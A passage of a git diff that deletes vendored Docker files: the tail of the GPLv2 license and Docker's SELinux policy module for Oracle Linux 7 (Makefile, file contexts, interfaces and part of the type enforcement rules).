all the rights that -you have. You must make sure that they, too, receive or can get the -source code. And you must show them these terms so they know their -rights. - - We protect your rights with two steps: (1) copyright the software, and -(2) offer you this license which gives you legal permission to copy, -distribute and/or modify the software. - - Also, for each author's protection and ours, we want to make certain -that everyone understands that there is no warranty for this free -software. If the software is modified by someone else and passed on, we -want its recipients to know that what they have is not the original, so -that any problems introduced by others will not reflect on the original -authors' reputations. - - Finally, any free program is threatened constantly by software -patents. We wish to avoid the danger that redistributors of a free -program will individually obtain patent licenses, in effect making the -program proprietary. To prevent this, we have made it clear that any -patent must be licensed for everyone's free use or not licensed at all. - - The precise terms and conditions for copying, distribution and -modification follow. - - GNU GENERAL PUBLIC LICENSE - TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION - - 0. This License applies to any program or other work which contains -a notice placed by the copyright holder saying it may be distributed -under the terms of this General Public License. The "Program", below, -refers to any such program or work, and a "work based on the Program" -means either the Program or any derivative work under copyright law: -that is to say, a work containing the Program or a portion of it, -either verbatim or with modifications and/or translated into another -language. (Hereinafter, translation is included without limitation in -the term "modification".) Each licensee is addressed as "you". - -Activities other than copying, distribution and modification are not -covered by this License; they are outside its scope. The act of -running the Program is not restricted, and the output from the Program -is covered only if its contents constitute a work based on the -Program (independent of having been made by running the Program). -Whether that is true depends on what the Program does. - - 1. You may copy and distribute verbatim copies of the Program's -source code as you receive it, in any medium, provided that you -conspicuously and appropriately publish on each copy an appropriate -copyright notice and disclaimer of warranty; keep intact all the -notices that refer to this License and to the absence of any warranty; -and give any other recipients of the Program a copy of this License -along with the Program. - -You may charge a fee for the physical act of transferring a copy, and -you may at your option offer warranty protection in exchange for a fee. - - 2. You may modify your copy or copies of the Program or any portion -of it, thus forming a work based on the Program, and copy and -distribute such modifications or work under the terms of Section 1 -above, provided that you also meet all of these conditions: - - a) You must cause the modified files to carry prominent notices - stating that you changed the files and the date of any change. - - b) You must cause any work that you distribute or publish, that in - whole or in part contains or is derived from the Program or any - part thereof, to be licensed as a whole at no charge to all third - parties under the terms of this License. - - c) If the modified program normally reads commands interactively - when run, you must cause it, when started running for such - interactive use in the most ordinary way, to print or display an - announcement including an appropriate copyright notice and a - notice that there is no warranty (or else, saying that you provide - a warranty) and that users may redistribute the program under - these conditions, and telling the user how to view a copy of this - License. (Exception: if the Program itself is interactive but - does not normally print such an announcement, your work based on - the Program is not required to print an announcement.) - -These requirements apply to the modified work as a whole. If -identifiable sections of that work are not derived from the Program, -and can be reasonably considered independent and separate works in -themselves, then this License, and its terms, do not apply to those -sections when you distribute them as separate works. But when you -distribute the same sections as part of a whole which is a work based -on the Program, the distribution of the whole must be on the terms of -this License, whose permissions for other licensees extend to the -entire whole, and thus to each and every part regardless of who wrote it. - -Thus, it is not the intent of this section to claim rights or contest -your rights to work written entirely by you; rather, the intent is to -exercise the right to control the distribution of derivative or -collective works based on the Program. - -In addition, mere aggregation of another work not based on the Program -with the Program (or with a work based on the Program) on a volume of -a storage or distribution medium does not bring the other work under -the scope of this License. - - 3. You may copy and distribute the Program (or a work based on it, -under Section 2) in object code or executable form under the terms of -Sections 1 and 2 above provided that you also do one of the following: - - a) Accompany it with the complete corresponding machine-readable - source code, which must be distributed under the terms of Sections - 1 and 2 above on a medium customarily used for software interchange; or, - - b) Accompany it with a written offer, valid for at least three - years, to give any third party, for a charge no more than your - cost of physically performing source distribution, a complete - machine-readable copy of the corresponding source code, to be - distributed under the terms of Sections 1 and 2 above on a medium - customarily used for software interchange; or, - - c) Accompany it with the information you received as to the offer - to distribute corresponding source code. (This alternative is - allowed only for noncommercial distribution and only if you - received the program in object code or executable form with such - an offer, in accord with Subsection b above.) - -The source code for a work means the preferred form of the work for -making modifications to it. For an executable work, complete source -code means all the source code for all modules it contains, plus any -associated interface definition files, plus the scripts used to -control compilation and installation of the executable. However, as a -special exception, the source code distributed need not include -anything that is normally distributed (in either source or binary -form) with the major components (compiler, kernel, and so on) of the -operating system on which the executable runs, unless that component -itself accompanies the executable. - -If distribution of executable or object code is made by offering -access to copy from a designated place, then offering equivalent -access to copy the source code from the same place counts as -distribution of the source code, even though third parties are not -compelled to copy the source along with the object code. - - 4. You may not copy, modify, sublicense, or distribute the Program -except as expressly provided under this License. Any attempt -otherwise to copy, modify, sublicense or distribute the Program is -void, and will automatically terminate your rights under this License. -However, parties who have received copies, or rights, from you under -this License will not have their licenses terminated so long as such -parties remain in full compliance. - - 5. You are not required to accept this License, since you have not -signed it. However, nothing else grants you permission to modify or -distribute the Program or its derivative works. These actions are -prohibited by law if you do not accept this License. Therefore, by -modifying or distributing the Program (or any work based on the -Program), you indicate your acceptance of this License to do so, and -all its terms and conditions for copying, distributing or modifying -the Program or works based on it. - - 6. Each time you redistribute the Program (or any work based on the -Program), the recipient automatically receives a license from the -original licensor to copy, distribute or modify the Program subject to -these terms and conditions. You may not impose any further -restrictions on the recipients' exercise of the rights granted herein. -You are not responsible for enforcing compliance by third parties to -this License. - - 7. If, as a consequence of a court judgment or allegation of patent -infringement or for any other reason (not limited to patent issues), -conditions are imposed on you (whether by court order, agreement or -otherwise) that contradict the conditions of this License, they do not -excuse you from the conditions of this License. If you cannot -distribute so as to satisfy simultaneously your obligations under this -License and any other pertinent obligations, then as a consequence you -may not distribute the Program at all. For example, if a patent -license would not permit royalty-free redistribution of the Program by -all those who receive copies directly or indirectly through you, then -the only way you could satisfy both it and this License would be to -refrain entirely from distribution of the Program. - -If any portion of this section is held invalid or unenforceable under -any particular circumstance, the balance of the section is intended to -apply and the section as a whole is intended to apply in other -circumstances. - -It is not the purpose of this section to induce you to infringe any -patents or other property right claims or to contest validity of any -such claims; this section has the sole purpose of protecting the -integrity of the free software distribution system, which is -implemented by public license practices. Many people have made -generous contributions to the wide range of software distributed -through that system in reliance on consistent application of that -system; it is up to the author/donor to decide if he or she is willing -to distribute software through any other system and a licensee cannot -impose that choice. - -This section is intended to make thoroughly clear what is believed to -be a consequence of the rest of this License. - - 8. If the distribution and/or use of the Program is restricted in -certain countries either by patents or by copyrighted interfaces, the -original copyright holder who places the Program under this License -may add an explicit geographical distribution limitation excluding -those countries, so that distribution is permitted only in or among -countries not thus excluded. In such case, this License incorporates -the limitation as if written in the body of this License. - - 9. The Free Software Foundation may publish revised and/or new versions -of the General Public License from time to time. Such new versions will -be similar in spirit to the present version, but may differ in detail to -address new problems or concerns. - -Each version is given a distinguishing version number. If the Program -specifies a version number of this License which applies to it and "any -later version", you have the option of following the terms and conditions -either of that version or of any later version published by the Free -Software Foundation. If the Program does not specify a version number of -this License, you may choose any version ever published by the Free Software -Foundation. - - 10. If you wish to incorporate parts of the Program into other free -programs whose distribution conditions are different, write to the author -to ask for permission. For software which is copyrighted by the Free -Software Foundation, write to the Free Software Foundation; we sometimes -make exceptions for this. Our decision will be guided by the two goals -of preserving the free status of all derivatives of our free software and -of promoting the sharing and reuse of software generally. - - NO WARRANTY - - 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY -FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN -OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES -PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED -OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF -MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS -TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE -PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, -REPAIR OR CORRECTION. - - 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING -WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR -REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, -INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING -OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED -TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY -YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER -PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE -POSSIBILITY OF SUCH DAMAGES. - - END OF TERMS AND CONDITIONS - - How to Apply These Terms to Your New Programs - - If you develop a new program, and you want it to be of the greatest -possible use to the public, the best way to achieve this is to make it -free software which everyone can redistribute and change under these terms. - - To do so, attach the following notices to the program. It is safest -to attach them to the start of each source file to most effectively -convey the exclusion of warranty; and each file should have at least -the "copyright" line and a pointer to where the full notice is found. - - - Copyright (C) - - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License along - with this program; if not, write to the Free Software Foundation, Inc., - 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. - -Also add information on how to contact you by electronic and paper mail. - -If the program is interactive, make it output a short notice like this -when it starts in an interactive mode: - - Gnomovision version 69, Copyright (C) year name of author - Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. - This is free software, and you are welcome to redistribute it - under certain conditions; type `show c' for details. - -The hypothetical commands `show w' and `show c' should show the appropriate -parts of the General Public License. Of course, the commands you use may -be called something other than `show w' and `show c'; they could even be -mouse-clicks or menu items--whatever suits your program. - -You should also get your employer (if you work as a programmer) or your -school, if any, to sign a "copyright disclaimer" for the program, if -necessary. Here is a sample; alter the names: - - Yoyodyne, Inc., hereby disclaims all copyright interest in the program - `Gnomovision' (which makes passes at compilers) written by James Hacker. - - , 1 April 1989 - Ty Coon, President of Vice - -This General Public License does not permit incorporating your program into -proprietary programs. If your program is a subroutine library, you may -consider it more useful to permit linking proprietary applications with the -library. If this is what you want to do, use the GNU Lesser General -Public License instead of this License. diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/Makefile b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/Makefile deleted file mode 100644 index 16df33ef32..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/Makefile +++ /dev/null @@ -1,23 +0,0 @@ -TARGETS?=docker -MODULES?=${TARGETS:=.pp.bz2} -SHAREDIR?=/usr/share - -all: ${TARGETS:=.pp.bz2} - -%.pp.bz2: %.pp - @echo Compressing $^ -\> $@ - bzip2 -9 $^ - -%.pp: %.te - make -f ${SHAREDIR}/selinux/devel/Makefile $@ - -clean: - rm -f *~ *.tc *.pp *.pp.bz2 - rm -rf tmp *.tar.gz - -man: install - sepolicy manpage --domain ${TARGETS}_t - -install: - semodule -i ${TARGETS} - diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/README.md b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/README.md deleted file mode 100644 index 7ea3117a89..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/README.md +++ /dev/null @@ -1 +0,0 @@ -SELinux policy for docker diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.fc b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.fc deleted file mode 100644 index 10b7d52a8b..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.fc +++ /dev/null @@ -1,33 +0,0 @@ -/root/\.docker gen_context(system_u:object_r:docker_home_t,s0) - -/usr/bin/docker -- gen_context(system_u:object_r:docker_exec_t,s0) -/usr/bin/docker-novolume-plugin -- gen_context(system_u:object_r:docker_auth_exec_t,s0) -/usr/lib/docker/docker-novolume-plugin -- gen_context(system_u:object_r:docker_auth_exec_t,s0) - -/usr/lib/systemd/system/docker.service -- gen_context(system_u:object_r:docker_unit_file_t,s0) -/usr/lib/systemd/system/docker-novolume-plugin.service -- gen_context(system_u:object_r:docker_unit_file_t,s0) - -/etc/docker(/.*)? gen_context(system_u:object_r:docker_config_t,s0) - -/var/lib/docker(/.*)? gen_context(system_u:object_r:docker_var_lib_t,s0) -/var/lib/kublet(/.*)? gen_context(system_u:object_r:docker_var_lib_t,s0) -/var/lib/docker/vfs(/.*)? gen_context(system_u:object_r:svirt_sandbox_file_t,s0) - -/var/run/docker(/.*)? gen_context(system_u:object_r:docker_var_run_t,s0) -/var/run/docker\.pid -- gen_context(system_u:object_r:docker_var_run_t,s0) -/var/run/docker\.sock -s gen_context(system_u:object_r:docker_var_run_t,s0) -/var/run/docker-client(/.*)? gen_context(system_u:object_r:docker_var_run_t,s0) -/var/run/docker/plugins(/.*)? gen_context(system_u:object_r:docker_plugin_var_run_t,s0) - -/var/lock/lxc(/.*)? gen_context(system_u:object_r:docker_lock_t,s0) - -/var/log/lxc(/.*)? gen_context(system_u:object_r:docker_log_t,s0) - -/var/lib/docker/init(/.*)? gen_context(system_u:object_r:docker_share_t,s0) -/var/lib/docker/containers/.*/hosts gen_context(system_u:object_r:docker_share_t,s0) -/var/lib/docker/containers/.*/hostname gen_context(system_u:object_r:docker_share_t,s0) -/var/lib/docker/.*/config\.env gen_context(system_u:object_r:docker_share_t,s0) - -# OL7.2 systemd selinux update -/var/run/systemd/machines(/.*)? gen_context(system_u:object_r:systemd_machined_var_run_t,s0) -/var/lib/machines(/.*)? gen_context(system_u:object_r:systemd_machined_var_lib_t,s0) diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.if b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.if deleted file mode 100644 index 4780af05f7..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.if +++ /dev/null @@ -1,659 +0,0 @@ - -## The open-source application container engine. - -######################################## -## -## Execute docker in the docker domain. -## -## -## -## Domain allowed to transition. -## -## -# -interface(`docker_domtrans',` - gen_require(` - type docker_t, docker_exec_t; - ') - - corecmd_search_bin($1) - domtrans_pattern($1, docker_exec_t, docker_t) -') - -######################################## -## -## Execute docker in the caller domain. -## -## -## -## Domain allowed to transition. -## -## -# -interface(`docker_exec',` - gen_require(` - type docker_exec_t; - ') - - corecmd_search_bin($1) - can_exec($1, docker_exec_t) -') - -######################################## -## -## Search docker lib directories. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_search_lib',` - gen_require(` - type docker_var_lib_t; - ') - - allow $1 docker_var_lib_t:dir search_dir_perms; - files_search_var_lib($1) -') - -######################################## -## -## Execute docker lib directories. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_exec_lib',` - gen_require(` - type docker_var_lib_t; - ') - - allow $1 docker_var_lib_t:dir search_dir_perms; - can_exec($1, docker_var_lib_t) -') - -######################################## -## -## Read docker lib files. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_read_lib_files',` - gen_require(` - type docker_var_lib_t; - ') - - files_search_var_lib($1) - read_files_pattern($1, docker_var_lib_t, docker_var_lib_t) -') - -######################################## -## -## Read docker share files. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_read_share_files',` - gen_require(` - type docker_share_t; - ') - - files_search_var_lib($1) - list_dirs_pattern($1, docker_share_t, docker_share_t) - read_files_pattern($1, docker_share_t, docker_share_t) - read_lnk_files_pattern($1, docker_share_t, docker_share_t) -') - -###################################### -## -## Allow the specified domain to execute docker shared files -## in the caller domain. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_exec_share_files',` - gen_require(` - type docker_share_t; - ') - - can_exec($1, docker_share_t) -') - -######################################## -## -## Manage docker lib files. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_manage_lib_files',` - gen_require(` - type docker_var_lib_t; - ') - - files_search_var_lib($1) - manage_files_pattern($1, docker_var_lib_t, docker_var_lib_t) - manage_lnk_files_pattern($1, docker_var_lib_t, docker_var_lib_t) -') - -######################################## -## -## Manage docker lib directories. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_manage_lib_dirs',` - gen_require(` - type docker_var_lib_t; - ') - - files_search_var_lib($1) - manage_dirs_pattern($1, docker_var_lib_t, docker_var_lib_t) -') - -######################################## -## -## Create objects in a docker var lib directory -## with an automatic type transition to -## a specified private type. -## -## -## -## Domain allowed access. -## -## -## -## -## The type of the object to create. -## -## -## -## -## The class of the object to be created. -## -## -## -## -## The name of the object being created. -## -## -# -interface(`docker_lib_filetrans',` - gen_require(` - type docker_var_lib_t; - ') - - filetrans_pattern($1, docker_var_lib_t, $2, $3, $4) -') - -######################################## -## -## Read docker PID files. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_read_pid_files',` - gen_require(` - type docker_var_run_t; - ') - - files_search_pids($1) - read_files_pattern($1, docker_var_run_t, docker_var_run_t) -') - -######################################## -## -## Execute docker server in the docker domain. -## -## -## -## Domain allowed to transition. -## -## -# -interface(`docker_systemctl',` - gen_require(` - type docker_t; - type docker_unit_file_t; - ') - - systemd_exec_systemctl($1) - init_reload_services($1) - systemd_read_fifo_file_passwd_run($1) - allow $1 docker_unit_file_t:file read_file_perms; - allow $1 docker_unit_file_t:service manage_service_perms; - - ps_process_pattern($1, docker_t) -') - -######################################## -## -## Read and write docker shared memory. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_rw_sem',` - gen_require(` - type docker_t; - ') - - allow $1 docker_t:sem rw_sem_perms; -') - -####################################### -## -## Read and write the docker pty type. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_use_ptys',` - gen_require(` - type docker_devpts_t; - ') - - allow $1 docker_devpts_t:chr_file rw_term_perms; -') - -####################################### -## -## Allow domain to create docker content -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_filetrans_named_content',` - - gen_require(` - type docker_var_lib_t; - type docker_share_t; - type docker_log_t; - type docker_var_run_t; - type docker_home_t; - ') - - files_pid_filetrans($1, docker_var_run_t, file, "docker.pid") - files_pid_filetrans($1, docker_var_run_t, sock_file, "docker.sock") - files_pid_filetrans($1, docker_var_run_t, dir, "docker-client") - logging_log_filetrans($1, docker_log_t, dir, "lxc") - files_var_lib_filetrans($1, docker_var_lib_t, dir, "docker") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "config.env") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hosts") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hostname") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "resolv.conf") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, dir, "init") - userdom_admin_home_dir_filetrans($1, docker_home_t, dir, ".docker") -') - -######################################## -## -## Connect to docker over a unix stream socket. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_stream_connect',` - gen_require(` - type docker_t, docker_var_run_t; - ') - - files_search_pids($1) - stream_connect_pattern($1, docker_var_run_t, docker_var_run_t, docker_t) -') - -######################################## -## -## Connect to SPC containers over a unix stream socket. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_spc_stream_connect',` - gen_require(` - type spc_t, spc_var_run_t; - ') - - files_search_pids($1) - files_write_all_pid_sockets($1) - allow $1 spc_t:unix_stream_socket connectto; -') - -######################################## -## -## All of the rules required to administrate -## an docker environment -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_admin',` - gen_require(` - type docker_t; - type docker_var_lib_t, docker_var_run_t; - type docker_unit_file_t; - type docker_lock_t; - type docker_log_t; - type docker_config_t; - ') - - allow $1 docker_t:process { ptrace signal_perms }; - ps_process_pattern($1, docker_t) - - admin_pattern($1, docker_config_t) - - files_search_var_lib($1) - admin_pattern($1, docker_var_lib_t) - - files_search_pids($1) - admin_pattern($1, docker_var_run_t) - - files_search_locks($1) - admin_pattern($1, docker_lock_t) - - logging_search_logs($1) - admin_pattern($1, docker_log_t) - - docker_systemctl($1) - admin_pattern($1, docker_unit_file_t) - allow $1 docker_unit_file_t:service all_service_perms; - - optional_policy(` - systemd_passwd_agent_exec($1) - systemd_read_fifo_file_passwd_run($1) - ') -') - -######################################## -## -## Execute docker_auth_exec_t in the docker_auth domain. -## -## -## -## Domain allowed to transition. -## -## -# -interface(`docker_auth_domtrans',` - gen_require(` - type docker_auth_t, docker_auth_exec_t; - ') - - corecmd_search_bin($1) - domtrans_pattern($1, docker_auth_exec_t, docker_auth_t) -') - -###################################### -## -## Execute docker_auth in the caller domain. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_auth_exec',` - gen_require(` - type docker_auth_exec_t; - ') - - corecmd_search_bin($1) - can_exec($1, docker_auth_exec_t) -') - -######################################## -## -## Connect to docker_auth over a unix stream socket. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_auth_stream_connect',` - gen_require(` - type docker_auth_t, docker_plugin_var_run_t; - ') - - files_search_pids($1) - stream_connect_pattern($1, docker_plugin_var_run_t, docker_plugin_var_run_t, docker_auth_t) -') - -######################################## -## -## docker domain typebounds calling domain. -## -## -## -## Domain to be typebound. -## -## -# -interface(`docker_typebounds',` - gen_require(` - type docker_t; - ') - - typebounds docker_t $1; -') - -######################################## -## -## Allow any docker_exec_t to be an entrypoint of this domain -## -## -## -## Domain allowed access. -## -## -## -# -interface(`docker_entrypoint',` - gen_require(` - type docker_exec_t; - ') - allow $1 docker_exec_t:file entrypoint; -') - -######################################## -## -## Send and receive messages from -## systemd machined over dbus. -## -## -## -## Domain allowed access. -## -## -# -interface(`systemd_dbus_chat_machined',` - gen_require(` - type systemd_machined_t; - class dbus send_msg; - ') - - allow $1 systemd_machined_t:dbus send_msg; - allow systemd_machined_t $1:dbus send_msg; - ps_process_pattern(systemd_machined_t, $1) -') - -######################################## -## -## Allow any svirt_sandbox_file_t to be an entrypoint of this domain -## -## -## -## Domain allowed access. -## -## -## -# -interface(`virt_sandbox_entrypoint',` - gen_require(` - type svirt_sandbox_file_t; - ') - allow $1 svirt_sandbox_file_t:file entrypoint; -') - -######################################## -## -## Send and receive messages from -## virt over dbus. -## -## -## -## Domain allowed access. -## -## -# -interface(`virt_dbus_chat',` - gen_require(` - type virtd_t; - class dbus send_msg; - ') - - allow $1 virtd_t:dbus send_msg; - allow virtd_t $1:dbus send_msg; - ps_process_pattern(virtd_t, $1) -') - -####################################### -## -## Read the process state of virt sandbox containers -## -## -## -## Domain allowed access. -## -## -# -interface(`virt_sandbox_read_state',` - gen_require(` - attribute svirt_sandbox_domain; - ') - - ps_process_pattern($1, svirt_sandbox_domain) -') - -###################################### -## -## Send a signal to sandbox domains -## -## -## -## Domain allowed access. -## -## -# -interface(`virt_signal_sandbox',` - gen_require(` - attribute svirt_sandbox_domain; - ') - - allow $1 svirt_sandbox_domain:process signal; -') - -####################################### -## -## Getattr Sandbox File systems -## -## -## -## Domain allowed access. -## -## -# -interface(`virt_getattr_sandbox_filesystem',` - gen_require(` - type svirt_sandbox_file_t; - ') - - allow $1 svirt_sandbox_file_t:filesystem getattr; -') - -####################################### -## -## Read Sandbox Files -## -## -## -## Domain allowed access. -## -## -# -interface(`virt_read_sandbox_files',` - gen_require(` - type svirt_sandbox_file_t; - ') - - list_dirs_pattern($1, svirt_sandbox_file_t, svirt_sandbox_file_t) - read_files_pattern($1, svirt_sandbox_file_t, svirt_sandbox_file_t) - read_lnk_files_pattern($1, svirt_sandbox_file_t, svirt_sandbox_file_t) -') - -####################################### -## -## Read the process state of spc containers -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_spc_read_state',` - gen_require(` - type spc_t; - ') - - ps_process_pattern($1, spc_t) -') - diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.te b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.te deleted file mode 100644 index d4de36fe46..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.te +++ /dev/null @@ -1,465 +0,0 @@ -policy_module(docker, 1.0.0) - -######################################## -# -# Declarations -# - -## -##

-## Determine whether docker can -## connect to all TCP ports. -##

-##
-gen_tunable(docker_connect_any, false) - -type docker_t; -type docker_exec_t; -init_daemon_domain(docker_t, docker_exec_t) -domain_subj_id_change_exemption(docker_t) -domain_role_change_exemption(docker_t) - -type spc_t; -domain_type(spc_t) -role system_r types spc_t; - -type docker_auth_t; -type docker_auth_exec_t; -init_daemon_domain(docker_auth_t, docker_auth_exec_t) - -type spc_var_run_t; -files_pid_file(spc_var_run_t) - -type docker_var_lib_t; -files_type(docker_var_lib_t) - -type docker_home_t; -userdom_user_home_content(docker_home_t) - -type docker_config_t; -files_config_file(docker_config_t) - -type docker_lock_t; -files_lock_file(docker_lock_t) - -type docker_log_t; -logging_log_file(docker_log_t) - -type docker_tmp_t; -files_tmp_file(docker_tmp_t) - -type docker_tmpfs_t; -files_tmpfs_file(docker_tmpfs_t) - -type docker_var_run_t; -files_pid_file(docker_var_run_t) - -type docker_plugin_var_run_t; -files_pid_file(docker_plugin_var_run_t) - -type docker_unit_file_t; -systemd_unit_file(docker_unit_file_t) - -type docker_devpts_t; -term_pty(docker_devpts_t) - -type docker_share_t; -files_type(docker_share_t) - -# OL7 systemd selinux update -type systemd_machined_t; -type systemd_machined_exec_t; -init_daemon_domain(systemd_machined_t, systemd_machined_exec_t) - -# /run/systemd/machines -type systemd_machined_var_run_t; -files_pid_file(systemd_machined_var_run_t) - -# /var/lib/machines -type systemd_machined_var_lib_t; -files_type(systemd_machined_var_lib_t) - - -######################################## -# -# docker local policy -# -allow docker_t self:capability { chown kill fowner fsetid mknod net_admin net_bind_service net_raw setfcap }; -allow docker_t self:tun_socket relabelto; -allow docker_t self:process { getattr signal_perms setrlimit setfscreate }; -allow docker_t self:fifo_file rw_fifo_file_perms; -allow docker_t self:unix_stream_socket create_stream_socket_perms; -allow docker_t self:tcp_socket create_stream_socket_perms; -allow docker_t self:udp_socket create_socket_perms; -allow docker_t self:capability2 block_suspend; - -docker_auth_stream_connect(docker_t) - -manage_files_pattern(docker_t, docker_home_t, docker_home_t) -manage_dirs_pattern(docker_t, docker_home_t, docker_home_t) -manage_lnk_files_pattern(docker_t, docker_home_t, docker_home_t) -userdom_admin_home_dir_filetrans(docker_t, docker_home_t, dir, ".docker") - -manage_dirs_pattern(docker_t, docker_config_t, docker_config_t) -manage_files_pattern(docker_t, docker_config_t, docker_config_t) -files_etc_filetrans(docker_t, docker_config_t, dir, "docker") - -manage_dirs_pattern(docker_t, docker_lock_t, docker_lock_t) -manage_files_pattern(docker_t, docker_lock_t, docker_lock_t) -files_lock_filetrans(docker_t, docker_lock_t, { dir file }, "lxc") - -manage_dirs_pattern(docker_t, docker_log_t, docker_log_t) -manage_files_pattern(docker_t, docker_log_t, docker_log_t) -manage_lnk_files_pattern(docker_t, docker_log_t, docker_log_t) -logging_log_filetrans(docker_t, docker_log_t, { dir file lnk_file }) -allow docker_t docker_log_t:dir_file_class_set { relabelfrom relabelto }; - -manage_dirs_pattern(docker_t, docker_tmp_t, docker_tmp_t) -manage_files_pattern(docker_t, docker_tmp_t, docker_tmp_t) -manage_lnk_files_pattern(docker_t, docker_tmp_t, docker_tmp_t) -files_tmp_filetrans(docker_t, docker_tmp_t, { dir file lnk_file }) - -manage_dirs_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_lnk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_fifo_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_chr_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_blk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -allow docker_t docker_tmpfs_t:dir relabelfrom; -can_exec(docker_t, docker_tmpfs_t) -fs_tmpfs_filetrans(docker_t, docker_tmpfs_t, { dir file }) -allow docker_t docker_tmpfs_t:chr_file mounton; - -manage_dirs_pattern(docker_t, docker_share_t, docker_share_t) -manage_files_pattern(docker_t, docker_share_t, docker_share_t) -manage_lnk_files_pattern(docker_t, docker_share_t, docker_share_t) -allow docker_t docker_share_t:dir_file_class_set { relabelfrom relabelto }; - -can_exec(docker_t, docker_share_t) -#docker_filetrans_named_content(docker_t) - -manage_dirs_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) -manage_chr_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) -manage_blk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) -manage_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) -manage_lnk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) -allow docker_t docker_var_lib_t:dir_file_class_set { relabelfrom relabelto }; -files_var_lib_filetrans(docker_t, docker_var_lib_t, { dir file lnk_file }) - -manage_dirs_pattern(docker_t, docker_var_run_t, docker_var_run_t) -manage_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) -manage_sock_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) -manage_lnk_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) -files_pid_filetrans(docker_t, docker_var_run_t, { dir file lnk_file sock_file }) - -allow docker_t docker_devpts_t:chr_file { relabelfrom rw_chr_file_perms setattr_chr_file_perms }; 